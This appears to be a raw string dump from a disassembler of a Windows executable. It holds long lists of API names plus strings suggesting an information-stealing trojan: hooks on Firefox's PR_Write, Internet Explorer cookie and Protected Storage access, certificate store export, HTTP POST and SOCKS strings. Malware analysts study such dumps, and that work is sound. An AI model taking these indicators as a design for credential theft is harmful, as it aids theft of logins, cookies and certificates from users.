aGetprivatepr_3 00421284 aGetprivatepr_4 004212A0
aGetprivatepr_5 004212BC
aGetprivatepr_6 004212DC aGetprivatepr_7 004212FC
aGetprivateprof 00421318
aGetprivatepr_8 00421330 aGetprioritycla 00421348
aGetoverlappe_0 0042135C
aGetoemcp 00421370 aGetnumberofcon 0042137C
aGetnumberofc_0 0042139C
aGetnumberforma 004213BC aGetnumberfor_0 004213D0
aGetnamedpipein 004213E4 aGetnamedpipeha 004213F8
aGetnamedpipe_0 00421414
aGetmodulehan_0 00421430 aGetmodulehan_1 00421444
aGetmodulefil_2 00421458
aGetmodulefil_3 0042146C
aGetmailslotinf 00421480
aGetlongpathnam 00421490
aGetlongpathn_0 004214A4 aGetlogicaldr_0 004214B8
aGetlogicaldr_1 004214CC
aGetlogicaldr_2 004214E4 aGetlocaleinfow 004214FC
aGetlocaleinfoa 0042150C
aGetlocaltime_0 0042151C aGetlasterror_0 0042152C
aGetlargestcons 0042153C
aGethandleinfor 00421558
aOlecreateembed 00419CF4
aOlecreatedefau 00419D10 aOlecreate 00419D28
aOleconvertoles 00419D34
aOleconvertol_0 00419D54 aOleconvertisto 00419D74
aOleconvertis_0 00419D94
aOlebuildversio 00419DB4 aMonikerrelativ 00419DC4
aMonikercommonp 00419DDC
aMkparsedisplay 00419DF4 aIsequalguid 00419E08
aIsaccelerator 00419E14
aIidfromstring 00419E24 aGetrunningobje 00419E34
aGethookinterfa 00419E4C
aGethglobalfrom 00419E60 aGethglobalfr_0 00419E78
aGetdocumentbit 00419E94
aGetconvertstg 00419EA8
aGetclassfile 00419EB8
aFreepropvarian 00419EC8
aEnablehookobje 00419EE0 aDodragdrop 00419EF4
aDlldebugobject 00419F00
aCreatestreamon 00419F18 aCreatepointerm 00419F30
aCreateoleadvis 00419F48
aCreateobjrefmo 00419F60 aCreateitemmoni 00419F74
aCreateilockbyt 00419F88
aCreategenericc 00419FA4 aCreatefilemoni 00419FBC
aCreatedatacach 00419FD0
aCreatedataadvi 00419FE0 aCreateclassmon 00419FF8
aCreatebindctx 0041A00C
aCreateantimoni 0041A01C aCounmarshalint 0041A030
aCounmarshalhre 0041A048
aCouninitialize 0041A05C aCotreatasclass 0041A06C
aCotaskmemreall 0041A07C
aCotaskmemfree 0041A090 aCotaskmemalloc 0041A0A0
aCoswitchcallco 0041A0B0
aCosuspendclass 0041A0C4 aCosetproxyblan 0041A0DC
aCorevokemalloc 0041A0F0
aCorevokeclasso 0041A104 aCoreverttoself 0041A118
aCoresumeclasso 0041A128 aCoreleaseserve 0041A140
aCoreleasemarsh 0041A158
aCoregistersurr 0041A170 aCoregisterpscl 0041A184
aCoregistermess 0041A198
aCoregistermall 0041A1B0
aCoregisterclas 0041A1C4
aCoregisterchan 0041A1DC
aCoqueryrelease 0041A1F4 aCoqueryproxybl 0041A20C
aCoqueryclientb 0041A220
aCoqueryauthent 0041A238 aComarshalinter 0041A258
aComarshalint_0 0041A26C
aComarshalhresu 0041A294 aColockobjectex 0041A2A8
aColoadlibrary 0041A2C0
aCoisole1class 0041A2D0
aLookupaccountn 0041D83C
aLookupaccoun_2 0041D850 aLogonuserw 0041D864
aLogonusera 0041D870
aLockservicedat 0041D87C aIsvalidsid 0041D890
aIsvalidsecurit 0041D89C
aIsvalidacl 0041D8B8 aIstextunicode 0041D8C4
aInitiatesystem 0041D8D4
aInitiatesyst_0 0041D8EC aInitializesid 0041D904
aInitializese_0 0041D914
aInitializeacl 0041D934 aImpersonatesel 0041D944
aImpersonatenam 0041D954
aImpersonatelog 0041D970 aGetusernamew_0 0041D988
aGetusernamea 0041D998
aGettrusteetype 0041D9A8
aGettrusteety_0 0041D9B8
aGettrusteename 0041D9C8
aGettrusteena_0 0041D9D8 aGettokeninfo_0 0041D9E8
aGetsidsubautho 0041D9FC
aGetsidsubaut_0 0041DA14 aGetsidlengthre 0041DA28
aGetsididentifi 0041DA40
aGetservicekeyn 0041DA5C aGetserviceke_0 0041DA70
aGetservicedisp 0041DA84
aGetservicedi_0 0041DA9C aGetsecurityinf 0041DAB4
aGetsecurityi_0 0041DAC8
aGetsecurityi_1 0041DADC aGetsecuritydes 0041DAEC
aGetsecurityd_0 0041DB08
aGetsecurityd_1 0041DB24 aGetsecurityd_2 0041DB40
aGetsecurityd_3 0041DB5C
aGetsecurityd_4 0041DB78 aGetprivateobje 0041DB98
aGetoverlappeda 0041DBB4
aGetoldestevent 0041DBD0 aGetnumberofeve 0041DBE8
aGetnamedsecuri 0041DC04
aGetnamedsecu_0 0041DC1C aGetnamedsecu_1 0041DC34
aGetnamedsecu_2 0041DC4C
aGetmultipletru 0041DC64 aGetmultiplet_0 0041DC78
aGetmultiplet_1 0041DC98 aGetmultiplet_2 0041DCB8
aGetlengthsid 0041DCCC
aGetkernelobjec 0041DCDC aGetfilesecurit 0041DCF4
aGetfilesecur_0 0041DD08
aGetexplicitent 0041DD1C
aGetexplicite_0 0041DD38
aGeteffectiveri 0041DD54
aGeteffective_0 0041DD70 aGetcurrenthwpr 0041DD8C
aGetcurrenthw_0 0041DDA4
aGetauditedperm 0041DDBC aGetauditedpe_0 0041DDDC
aGetaclinformat 0041DDFC
aGetace 0041DE10 aGetaccesspermi 0041DE18
aGetaccessper_0 0041DE38
aFreesid 0041DE58
aGetfullpathnam 00421570
aGetfullpathn_0 00421584 aGetfiletype 00421598
aGetfiletime_0 004215A4
aGetfilesize_0 004215B0 aGetfileinfor_0 004215BC
aGetfileattri_0 004215D8
aGetfileattri_1 004215EC aGetfileattri_2 00421604
aGetfileattri_3 0042161C
aGetexitcodethr 00421630 aGetexitcodep_0 00421644
aGetenvironme_1 00421658
aGetenvironme_2 00421670 aGetenvironment 00421688
aGetenvironme_3 004216A0
aGetenvironme_4 004216B8 aGetdrivetype_0 004216D0
aGetdrivetypea 004216E0
aGetdiskfreespa 004216F0
aGetdiskfrees_0 00421704
aGetdiskfrees_1 00421718
aGetdiskfrees_2 0042172C aGetdevicepower 00421740
aGetdefaultcomm 00421754
aGetdefaultco_0 0042176C aGetdateformatw 00421784
aGetdateformata 00421794
aGetcurrentth_1 004217A4 aGetcurrentth_2 004217B8
aGetcurrentpr_0 004217CC
aGetcurrentpr_1 004217E0 aGetcurrentdire 004217F4
aGetcurrentdi_0 0042180C
aGetcurrencyfor 00421824 aGetcurrencyf_0 00421838
aGetconsoletitl 0042184C
aGetconsoleti_0 00421860 aGetconsolescre 00421874
aGetconsoleoutp 00421890
aGetconsolemode 004218A4 aGetconsolecurs 004218B4
aGetconsolecp 004218CC
aGetcomputern_0 004218DC aGetcomputern_1 004218F0
aGetcompressedf 00421904
aGetcompresse_0 0042191C aGetcommandli_0 00421934
aGetcommandli_1 00421944
aGetcommtimeout 00421954 aGetcommstate 00421964
aGetcommpropert 00421974 aGetcommmodemst 00421988
aGetcommmask 0042199C
aGetcommconfig 004219A8 aGetcalendarinf 004219B8
aGetcalendari_0 004219CC
aGetcpinfoexw 004219E0
aGetcpinfoexa 004219F0
aGetcpinfo 00421A00
aGetbinarytypew 00421A0C aGetbinarytypea 00421A1C
aGetbinarytype 00421A2C
aGetatomnamew 00421A3C aGetatomnamea 00421A4C
aGetacp 00421A5C
aGenerateconsol 00421A64 aFreeresource 00421A80
aFreelibraryand 00421A90
aFreelibrary_0 00421AAC
aCoishandlercon 0041A2E0
aCoinitializese 0041A2F8 aCoinitializeex 0041A310
aCoinitialize 0041A320
aCoimpersonatec 0041A330 aCogettreatascl 0041A344
aCogetstandardm 0041A358
aCogetpsclsid 0041A370 aCogetobject 0041A380
aCogetmarshalsi 0041A38C
aCogetmalloc 0041A3A0 aCogetinterface 0041A3AC
aCogetinstancef 0041A3CC
aCogetinstanc_0 0041A3E8 aCogetcurrentpr 0041A400
aCogetcurrentlo 0041A414
aCogetclassobje 0041A430 aCogetcallertid 0041A444
aCogetcallconte 0041A454
aCofreeunusedli 0041A468
aCofreelibrary 0041A480
aCofreealllibra 0041A490
aCofiletimetodo 0041A4A4 aCofiletimenow 0041A4BC
aCodosdatetimet 0041A4CC
aCodisconnectob 0041A4E4 aCocreateinst_0 0041A4F8
aCocreateinst_1 0041A50C
aCocreateguid 0041A520 aCocreatefreeth 0041A530
aCocopyproxy 0041A550
aCobuildversion 0041A55C aCoaddrefserver 0041A56C
aClsidfromstr_0 0041A584
aClsidfromprogi 0041A594 aBindmoniker 0041A5A4
aWindowfrompoin 0041A5B0
aWindowfromdc 0041A5C0 aWinhelpw 0041A5D0
aWinhelpa 0041A5DC
aWaitmessage 0041A5E8 aWaitforinputid 0041A5F4
aWinnlsgetimeho 0041A608
aWinnlsgetenabl 0041A61C aWinnlsenableim 0041A634
aVkkeyscanw 0041A644
aVkkeyscanexw 0041A650 aVkkeyscanexa 0041A660
aVkkeyscana 0041A670
aValidatergn 0041A67C aValidaterect 0041A688
aUpdatewindow 0041A698 aUnregisterhotk 0041A6A8
aUnregisterdevi 0041A6BC
aUnregisterclas 0041A6DC aUnregistercl_0 0041A6F0
aUnpackddelpara 0041A704
aUnloadkeyboard 0041A714
aUnionrect 0041A72C
aUnhookwindowsh 0041A738
aUnhookwindow_0 0041A74C aUnhookwinevent 0041A760
aTranslatemes_0 0041A770
aTranslatemdisy 0041A784 aTranslateaccel 0041A79C
aTranslateacc_0 0041A7B4
aTranslateacc_1 0041A7CC aTrackpopupmenu 0041A7E4
aTrackpopupme_0 0041A7F8
aTrackmouseeven 0041A808
aFindfirstfreea 0041DE60
aEqualsid 0041DE74 aEqualprefixsid 0041DE80
aEnumservicesst 0041DE90
aEnumservices_0 0041DEA4 aEnumdependents 0041DEB8
aEnumdependen_0 0041DED0
aDuplicatetok_0 0041DEE8 aDuplicatetok_1 0041DEFC
aDestroyprivate 0041DF0C
aDeregistereven 0041DF2C aDeleteservice 0041DF44
aDeleteace 0041DF54
aCryptverifysig 0041DF60 aCryptverifys_0 0041DF78
aCryptsignhashw 0041DF90
aCryptsignhasha 0041DFA0 aCryptsetprovid 0041DFB0
aCryptsetprov_0 0041DFC4
aCryptsetprov_1 0041DFD8
aCryptsetprov_2 0041DFEC
aCryptsetprovpa 0041E000
aCryptsetkeypar 0041E014 aCryptsethashpa 0041E028
aCryptrelease_0 0041E03C
aCryptimportkey 0041E050 aCrypthashsessi 0041E060
aCrypthashdat_0 0041E074
aCryptgetuserke 0041E084 aCryptgetprovpa 0041E094
aCryptgetkeypar 0041E0A8
aCryptgethash_0 0041E0BC aCryptgetdefaul 0041E0D0
aCryptgetdefa_0 0041E0EC
aCryptgenrandom 0041E108 aCryptgenkey 0041E118
aCryptexportkey 0041E124
aCryptenumprovi 0041E134 aCryptenumpro_0 0041E148
aCryptenumpro_1 0041E15C
aCryptenumpro_2 0041E174 aCryptencrypt 0041E18C
aCryptduplicate 0041E19C
aCryptduplica_0 0041E1B0 aCryptdestroyke 0041E1C4
aCryptdestroy_0 0041E1D4
aCryptderivekey 0041E1E8 aCryptdecrypt 0041E1F8
aCryptcreateh_0 0041E208
aCryptcontextad 0041E218 aCryptacquire_0 0041E22C
aCryptacquire_1 0041E244 aCreateservicew 0041E25C
aCreateservicea 0041E26C
aCreateproces_0 0041E27C aCreateproces_1 0041E294
aCreateprivateo 0041E2AC
aCopysid 0041E2C8
aConvertsecurit 0041E2D0
aConvertsecur_0 0041E2F4
aConvertsecur_1 0041E31C aConvertsecur_2 0041E344
aConvertaccesst 0041E368
aConvertacces_0 0041E38C aControlservice 0041E3B0
aCloseserviceha 0041E3C0
aCloseeventlog 0041E3D4 aCleareventlogw 0041E3E4
aCleareventloga 0041E3F4
aChangeservicec 0041E404
aFreeenvironmen 00421AB8
aFreeenvironm_0 00421AD0 aFreeconsole 00421AE8
aFormatmessag_0 00421AF4
aFormatmessagea 00421B04 aFoldstringw 00421B14
aFoldstringa 00421B20
aFlushviewoffil 00421B2C aFlushinstructi 00421B3C
aFlushfilebuf_0 00421B54
aFlushconsolein 00421B68 aFindresource_0 00421B80
aFindresourceex 00421B90
aFindresource_1 00421BA0 aFindresourcea 00421BB0
aFindnextfile_0 00421BC0
aFindnextfilea 00421BD0 aFindnextchange 00421BE0
aFindfirstfil_0 00421BFC
aFindfirstfilee 00421C0C
aFindfirstfil_1 00421C20
aFindfirstfilea 00421C34
aFindfirstchang 00421C44 aFindfirstcha_0 00421C64
aFindclosechang 00421C84
aFindclose_0 00421CA0 aFindatomw 00421CAC
aFindatoma 00421CB8
aFillconsoleout 00421CC4 aFillconsoleo_0 00421CE0
aFillconsoleo_1 00421CFC
aFiletimetosyst 00421D18 aFiletimetolo_0 00421D30
aFiletimetodo_0 00421D48
aFatalexit 00421D60 aFatalappexitw 00421D6C
aFatalappexita 00421D7C
aExpandenviro_0 00421D8C aExpandenviro_1 00421DA8
aExitprocess_0 00421DC4
aEscapecommfunc 00421DD0 aErasetape 00421DE4
aEnumtimeformat 00421DF0
aEnumtimeform_0 00421E04 aEnumsystemloca 00421E18
aEnumsystemlo_0 00421E2C
aEnumsystemcode 00421E40 aEnumsystemco_0 00421E58
aEnumresourcety 00421E70
aEnumresource_0 00421E84 aEnumresourcena 00421E98
aEnumresource_1 00421EAC aEnumresourcela 00421EC0
aEnumresource_2 00421ED8
aEnumdateform_0 00421EF0 aEnumdateform_1 00421F04
aEnumdateformat 00421F18
aEnumdateform_2 00421F2C
aEnumcalendarin 00421F40
aEnumcalendar_0 00421F54
aEnumcalendar_1 00421F68 aEnumcalendar_2 00421F7C
aEndupdateresou 00421F90
aEndupdateres_0 00421FA4 aDuplicatehandl 00421FB8
aDosdatetimetof 00421FC8
aDisconnectna_0 00421FE0 aDisablethreadl 00421FF4
aDeviceiocontro 00422010
aDeletefilew_0 00422020
aTounicodeex 0041A818
aTounicode_0 0041A824 aToasciiex 0041A830
aToascii 0041A83C
aTilewindows 0041A844 aTilechildwindo 0041A850
aTabbedtextoutw 0041A864
aTabbedtextouta 0041A874 aSystemparamete 0041A884
aSystemparame_0 0041A89C
aSwitchtothiswi 0041A8B4 aSwitchdesktop 0041A8C8
aSwapmousebutto 0041A8D8
aSubtractrect 0041A8E8 aShowwindowasyn 0041A8F8
aShowwindow 0041A908
aShowscrollbar 0041A914 aHowownedpopups 0041A925
aShowcursor 0041A934
aShowcaret 0041A940
aSetwindowshook 0041A94C
aSetwindowsho_0 0041A95C
aSetwindowsho_1 0041A970 aSetwindowsho_2 0041A984
aSetwindowword 0041A994
aSetwindowtextw 0041A9A4 aSetwindowtexta 0041A9B4
aSetwindowrgn 0041A9C4
aSetwindowpos 0041A9D4 aSetwindowplace 0041A9E4
aSetwindowlongw 0041A9F8
aSetwindowlonga 0041AA08 aSetwindowconte 0041AA18
aSetwineventhoo 0041AA30
aSetuserobjects 0041AA40 aSetuserobjecti 0041AA58
aSetuserobjec_0 0041AA74
aSettimer 0041AA90 aSetthreaddes_0 0041AA9C
aSetsystemcurso 0041AAB0
aSetsyscolors 0041AAC0 aSetshellwindow 0041AAD0
aSetscrollrange 0041AAE0
aEtscrollpos 0041AAF1 aSetscrollinfo 0041AB00
aSetrectempty 0041AB10
aSetrect 0041AB20 aSetpropw 0041AB28
aSetpropa 0041AB34
aSetprocesswi_0 0041AB40 aEtprocessdefau 0041AB59
aSetparent 0041AB70 aSetmessagequeu 0041AB7C
aSetmessageextr 0041AB8C
aSetmenuiteminf 0041ABA0 aEtmenuiteminfo 0041ABB5
aSetmenuitembit 0041ABC8
aSetmenuinfo 0041ABDC
aSetmenudefault 0041ABE8
aSetmenucontext 0041ABFC
aSetmenu 0041AC14 aSetlasterrorex 0041AC1C
aSetkeyboardsta 0041AC2C
aSetforegroundw 0041AC40 aSetfocus 0041AC54
aSetdoubleclick 0041AC60
aSetdlgitemtext 0041AC74 aSetdlgitemte_0 0041AC84
aSetdlgitemint 0041AC94
aSetdeskwallpap 0041ACA4
aChangeservic_0 0041E41C
aCanceloverlapp 0041E434 aBuildtrusteewi 0041E44C
aBuildtrustee_0 0041E464
aBuildtrustee_1 0041E47C aBuildtrustee_2 0041E494
aBuildsecurityd 0041E4AC
aBuildsecurit_0 0041E4C8 aBuildimpersona 0041E4E4
aBuildimperso_0 0041E500
aBuildimperso_1 0041E51C aBuildimperso_2 0041E544
aBuildexplicita 0041E56C
aBuildexplici_0 0041E58C aBackupeventlog 0041E5AC
aBackupeventl_0 0041E5BC
aAreanyaccesses 0041E5CC aAreallaccesses 0041E5E4
aAllocatelocall 0041E5FC
aAllocateandini 0041E614
aAdjusttokenp_0 0041E630
aAdjusttokengro 0041E648
aAddauditaccess 0041E65C aAddace 0041E670
aAddaccessdenie 0041E678
aAddaccessallow 0041E68C aAccesscheckand 0041E6A0
aAccesschecka_0 0041E6BC
aAccesscheck 0041E6D8 aAbortsystemshu 0041E6E4
aAbortsystems_0 0041E6FC
aWvnsprintfw_0 0041E714 aWvnsprintfa_0 0041E720
aWnsprintfw_0 0041E72C
aWnsprintfa_0 0041E738 aUrlunescapew 0041E744
aUrlunescapea 0041E754
aUrlisw 0041E764 aUrlisopaquew 0041E76C
aUrlisopaquea 0041E77C
aUrlisnohistory 0041E78C aUrlisnohisto_0 0041E79C
aUrlisa 0041E7AC
aUrlhashw 0041E7B4 aUrlhasha 0041E7C0
aUrlgetpartw 0041E7CC
aUrlgetparta 0041E7D8 aUrlgetlocation 0041E7E4
aUrlgetlocati_0 0041E7F4
aUrlescapew 0041E804 aUrlescapea 0041E810
aUrlcreatefromp 0041E81C aUrlcreatefro_0 0041E830
aUrlcomparew 0041E844
aUrlcomparea 0041E850 aUrlcombinew 0041E85C
aUrlcombinea 0041E868
aUrlcanonicaliz 0041E874
aUrlcanonical_0 0041E888
aUrlapplyscheme 0041E89C
aUrlapplysche_0 0041E8AC aStrtrimw 0041E8BC
aStrtrima 0041E8C8
aStrtointw 0041E8D4 aStrtointexw 0041E8E0
aStrtointexa 0041E8EC
aStrtointa 0041E8F8 aStrstrw_0 0041E904
aStrstriw 0041E90C
aStrstria_0 0041E918
aDeletefilea 0042202C
aDeletefiber 00422038 aDeleteatom 00422044
aDefinedosdevic 00422050
aDefinedosdev_0 00422064 aDebugbreak 00422078
aDebugactivepro 00422084
aCreatewaitable 00422098 aCreatewaitab_0 004220B0
aCreatetoolhe_0 004220C8
aCreatethread_0 004220E4 aCreatetapepart 004220F4
aCreatesemaphor 00422108
aCreatesemaph_0 0042211C aCreateremote_0 00422130
aCreateproces_2 00422144
aCreateproces_3 00422154 aCreatepipe 00422164
aCreatenamedp_0 00422170
aCreatenamedp_1 00422184
aCreatemutexw_0 00422198
aCreatemutexa 004221A8
aCreatemailslot 004221B8 aCreatemailsl_0 004221C8
aCreateiocomple 004221D8
aCreatefilew_0 004221F0 aCreatefilema_0 004221FC
aCreatefilema_1 00422210
aCreatefilea 00422224 aCreatefiber 00422230
aCreateeventw_0 0042223C
aCreateeventa 0042224C aCreatedirect_0 0042225C
aCreatedirect_1 00422270
aCreatedirect_2 00422284 aCreatedirect_3 00422298
aCreateconsoles 004222AC
aCopyfilew_0 004222C8 aCopyfileexw 004222D4
aCopyfileexa 004222E0
aCopyfilea 004222EC aConvertthreadt 004222F8
aConvertdefault 00422310
aContinuedebuge 00422328 aConnectnamed_0 0042233C
aComparestringw 00422350
aComparestringa 00422360 aComparefiletim 00422370
aCommconfigdial 00422380
aCommconfigdi_0 00422394 aClosehandle_0 004223A8
aClearcommerror 004223B4 aClearcommbreak 004223C4
aCancelwaitable 004223D4
aCancelio 004223E8 aCanceldevicewa 004223F4
aCallnamedpipew 00422410
aCallnamedpipea 00422420
aBuildcommdcbw 00422430
aBuildcommdcban 00422440
aBuildcommdcb_0 0042245C aBuildcommdcba 00422478
aBeginupdateres 00422488
aBeginupdater_0 004224A0 aBeep 004224B8
aBackupwrite 004224C0
aBackupseek 004224CC aBackupread 004224D8
aArefileapisans 004224E4
aAllocconsole 004224F4
aSetdebugerrorl 0041ACB8
aSetcursorpos 0041ACCC aSetcursor 0041ACDC
aSetclipboardvi 0041ACE8
aSetclipboardda 0041ACFC aSetclassword 0041AD10
aSetclasslongw 0041AD20
aSetclasslonga 0041AD30 aSetcaretpos 0041AD40
aSetcaretblinkt 0041AD4C
aSetcapture 0041AD60 aSetactivewindo 0041AD6C
aSendnotifymess 0041AD7C
aSendnotifyme_0 0041AD90 aSendmessagew_0 0041ADA4
aSendmessagetim 0041ADB4
aSendmessaget_0 0041ADC8 aSendmessagecal 0041ADDC
aSendmessagec_0 0041ADF4
aSendmessagea 0041AE0C
aSendinput 0041AE1C
aSendimemessage 0041AE28
aSendimemessa_0 0041AE3C aSenddlgitemmes 0041AE50
aSenddlgitemm_0 0041AE64
aScrollwindowex 0041AE78 aScrollwindow 0041AE88
aScrolldc 0041AE98
aScreentoclient 0041AEA4 aReuseddelparam 0041AEB4
aReplymessage 0041AEC4
aRemovepropw 0041AED4 aRemovepropa 0041AEE0
aRemovemenu 0041AEEC
aReleasedc 0041AEF8 aReleasecapture 0041AF04
aRegisterwindow 0041AF14
aRegisterwind_0 0041AF2C aRegisterhotkey 0041AF44
aRegisterdevice 0041AF54
aRegisterdevi_0 0041AF70 aRegisterclipbo 0041AF8C
aRegisterclip_0 0041AFA8
aRegisterclassw 0041AFC4 aRegisterclasse 0041AFD4
aRegisterclas_0 0041AFE8
aRegisterclassa 0041AFFC aRedrawwindow 0041B00C
aRealgetwindowc 0041B01C
aRealchildwindo 0041B030 aPtinrect 0041B04C
aPostthreadmess 0041B058 aPostthreadme_0 0041B06C
aStrstra 0041E924
aStrspnw 0041E92C aStrspna 0041E934
aStrrettostrw 0041E93C
aStrrettostra 0041E94C aStrrettobufw 0041E95C
aStrrettobufa 0041E96C
aStrrstriw 0041E97C aStrrstria 0041E988
aStrrchrw 0041E994
aStrrchriw 0041E9A0 aStrrchria 0041E9AC
aStrrchra 0041E9B8
aStrpbrkw 0041E9C4 aStrpbrka 0041E9D0
aStrncatw 0041E9DC
aStrncata 0041E9E8 aStrisintlequal 0041E9F4
aStrisintlequ_0 0041EA04
aStrfromtimeint 0041EA14
aStrfromtimei_0 0041EA2C
aStrformatkbsiz 0041EA44
aStrformatkbs_0 0041EA58 aStrformatbytes 0041EA6C
aStrformatbyt_0 0041EA80
aStrformatbyt_1 0041EA94 aStrdupw 0041EAAC
aStrdupa 0041EAB4
aStrcpyw 0041EABC aStrcpynw 0041EAC4
aStrcmpw 0041EAD0
aStrcmpnw 0041EAD8 aStrcmpniw_0 0041EAE4
aStrcmpnia_0 0041EAF0
aStrcmpna 0041EAFC aStrcmpiw 0041EB08
aStrchrw 0041EB14
aStrchriw 0041EB1C aStrchria 0041EB28
aStrchra 0041EB34
aStrcatw 0041EB3C aStrcatbuffw 0041EB44
aStrcatbuffa 0041EB50
aStrcspnw 0041EB5C aStrcspniw 0041EB68
aStrcspnia 0041EB74
aStrcspna 0041EB80 aShstrdupw 0041EB8C
aShstrdupa 0041EB98
aShskipjunction 0041EBA4 aShsetvaluew 0041EBB4
aShsetvaluea 0041EBC0 aShsetthreadref 0041EBCC
aAddatomw 00422504
aAddatoma 00422510 String1 0042251C
aEntry 00422520
LibFileName 00422528 ProcName 00422538
aDans 0042254C
aRich 00422554 a_text 0042255C
a_rdata 00422564
a_data 0042256C aWritefile_1 00428776
aReadfile_1 00428782
aCreatefilew_1 0042878C aOpenmutexw_1 0042879A
aSetnamedpipe_1 004287A6
aHeaprealloc_0 004287C0 aMultibytetow_1 0042885C
aGetfilesizee_0 00428872
aCreatefilema_2 00428882
aSetfileattri_2 00428896
aCreatethread_1 004288AA
aClosehandle_1 004288B8 aSleep_1 004288C6
aGetmodulehan_2 004288CE
aLoadlibrarya_1 004288E0 aGetprocaddre_1 004288EE
aGetmodulefil_4 004288FE
aExitprocess_1 00428912 aLstrcmpia_1 00428920
aLstrcpyw_1 0042892C
aWidechartomu_1 00428936 aDeletefilew_1 0042894C
aCrypthashdat_1 0042895A
aCryptdestroy_1 0042896A aCryptcreateh_1 0042897C
aCryptgethash_1 0042898E
aCryptrelease_1 004289A2 aCryptacquire_2 004289B8
aGetsavefilenam 004289CE
aGetopenfilenam 004289E0 aOleinitializ_0 004289F2
aPathremovefi_2 00428A2C
aPathfindfile_2 00428A60 aPathcombinew_1 00428A74
aGetwindowtex_2 00428A82
aMessageboxw_0 00428A98 aCreatedialog_2 00428AFC
aGetdlgitem_1 00428B10
aSetwindowlon_0 00428B1C aGetdlgitemte_3 00428B2C
aS 00429028
Comment Strings:
.text:0040429C 0000002E C -!This program cannot be run in DOS
mode.\r\r\n$
.text:004046FC 0000000A C nspr4.dll
.text:00404708 00000009 C PR_Write
.text:00404714 00000011 C PopOpO03-3331111
.text:0040472C 0000000B C \nPath: %s\n
.text:00404738 00000007 C %s=%s\n
.text:00404768 00000015 C PStoreCreateInstance
.text:00404780 0000000C C pstorec.dll
.text:004047A4 0000000E C \nIE Cookies:\n
.text:004047B4 00000006 C Empty
.text:0041D120 0000001C C RegisterServiceCtrlHandlerA
.text:0041D13C 00000015 C RegisterEventSourceW
.text:0041D154 00000015 C RegisterEventSourceA
.text:0041D16C 0000000E C RegUnLoadKeyW
.text:0041D17C 0000000E C RegUnLoadKeyA
.text:0041D18C 0000000D C RegSetValueW
.text:0041D19C 0000000F C RegSetValueExW
.text:0041D1AC 0000000F C RegSetValueExA
.text:0041D1BC 0000000D C RegSetValueA
.text:0041D1CC 00000012 C RegSetKeySecurity
.text:0041D1E0 0000000C C RegSaveKeyW
.text:00405278 00000011 C TranslateMessage
.text:0040528C 0000000B C WSAConnect
.text:00405298 00000008 C connect
.text:004052A0 0000000C C closesocket
.text:004052AC 00000005 C send
.text:004052B4 0000000F C HttpQueryInfoW
.text:004052C4 0000000F C HttpQueryInfoA
.text:004052D4 00000014 C InternetCloseHandle
.text:004052E8 0000001B C InternetQueryDataAvailable
.text:00405304 00000014 C InternetReadFileExA
.text:00405318 00000014 C InternetReadFileExW
.text:0040532C 00000011 C InternetReadFile
.text:00405340 00000013 C HttpSendRequestExA
.text:00405354 00000013 C HttpSendRequestExW
.text:00405368 00000011 C HttpSendRequestA
.text:0040537C 00000011 C HttpSendRequestW
.text:00405390 00000015 C NtQueryDirectoryFile
.text:004053A8 00000017 C LdrGetProcedureAddress
.text:004053C0 0000000B C LdrLoadDll
.text:004053CC 0000000F C NtCreateThread
.text:004053EC 00000011 C 09ck_=ldfuihpfre
.text:00405400 00000011 C 3709128dk0023444
.text:0040541C 00000011 C !!!0-0=9-0=23434
.text:00405430 0000000B C Start Page
.text:0040543C 0000002A C software\\microsoft\\internet explorer\\main
.text:00405468 00000011 C ~23324m'm434dKkl
.text:0040547C 00000011 C 3208()_*09303333
.text:004054A8 00000005 C GET
.text:004054B0 00000006 C POST
.text:004054B8 00000008 C HTTP/1.
.text:004054C0 00000005 C Host
.text:004054C8 0000000F C PR_GetPeerName
.text:004054D8 00000008 C Referer
.text:004054E0 0000000D C Content-Type
.text:004054F0 00000016 C PR_GetNameForIdentity
.text:00405508 0000000A C NSS layer
.text:00405514 00000009 C https://
.text:00405520 00000008 C http://
.text:00405528 0000000C C %u.%u.%u.%u
.text:0040553C 00000005 C POST
.text:00405544 0000000F C GetProcAddress
.text:00405554 0000000D C LoadLibraryA
.text:00405564 00000011 C 0928394074595794
.text:00405578 00000011 C 809dslffsdfsdfgg
.text:0040558C 00000011 C M<,,>Keolkp90344
.text:004055A4 0000001C C Unknown command at line %u.
.text:004055C0 00000019 C Syntax error at line %u.
.text:004055DC 00000019 C Script already executed.
.text:004055F8 00000023 C Internal command error at line %u.
.text:00405694 00000006 C socks
.text:0040569C 00000011 C !213KJhndkmnihjd
.text:004056B0 00000009 C %s|%s|%s
.text:004056BC 0000000F C GetUserNameExW
.text:004056CC 00000013 C PFXExportCertStore
.text:004056E0 00000020 C CertDuplicateCertificateContext
.text:00405702 0000001D C rtDeleteCertificateFromStore
.text:00405720 00000014 C CertEnumSystemStore
.text:00405735 0000001B C ertEnumCertificatesInStore
.text:00405750 0000000F C CertCloseStore
.text:00405760 00000015 C CertOpenSystemStoreW
.text:00405778 00000010 C CLSIDFromString
.text:00405788 00000010 C StringFromGUID2
.text:00405798 00000011 C CoCreateInstance
.text:004057AC 0000000F C GetWindowTextW
.text:004057BC 0000000E C GetClassNameW
.text:004057CC 0000000F C GetWindowLongW
.text:004057DC 0000000D C SendMessageW
.text:004057EC 0000000E C FindWindowExW
.text:004057FC 00000010 C GetDlgItemTextW
.text:0040580C 00000010 C GetDlgItemTextA
.text:0041D1EC 0000000C C RegSaveKeyA
.text:0041D1F8 0000000F C RegRestoreKeyW
.text:0041D208 0000000F C RegRestoreKeyA
.text:0041D218 0000000F C RegReplaceKeyW
.text:0041D228 0000000F C RegReplaceKeyA
.text:0041D238 0000000F C RegQueryValueW
.text:0041D248 00000011 C RegQueryValueExW
.text:0041D25C 00000011 C RegQueryValueExA
.text:0041D270 0000000F C RegQueryValueA
.text:0041D280 00000018 C RegQueryMultipleValuesW
.text:0041D298 00000018 C RegQueryMultipleValuesA
.text:0041D2B0 00000011 C RegQueryInfoKeyW
.text:0041D2C4 00000011 C RegQueryInfoKeyA
.text:0041D2D8 0000000C C RegOpenKeyW
.text:0041D2E4 0000000E C RegOpenKeyExW
.text:0041D2F4 0000000E C RegOpenKeyExA
.text:0041D304 0000000C C RegOpenKeyA
.text:0041D310 00000018 C RegNotifyChangeKeyValue
.text:0041D328 0000000C C RegLoadKeyW
.text:0041D334 0000000C C RegLoadKeyA
.text:0041D340 00000012 C RegGetKeySecurity
.text:0041D354 0000000C C RegFlushKey
.text:0041D360 0000000E C RegEnumValueW
.text:0041D370 0000000E C RegEnumValueA
.text:0041D380 0000000C C RegEnumKeyW
.text:0041D38C 0000000E C RegEnumKeyExW
.text:0041D39C 0000000E C RegEnumKeyExA
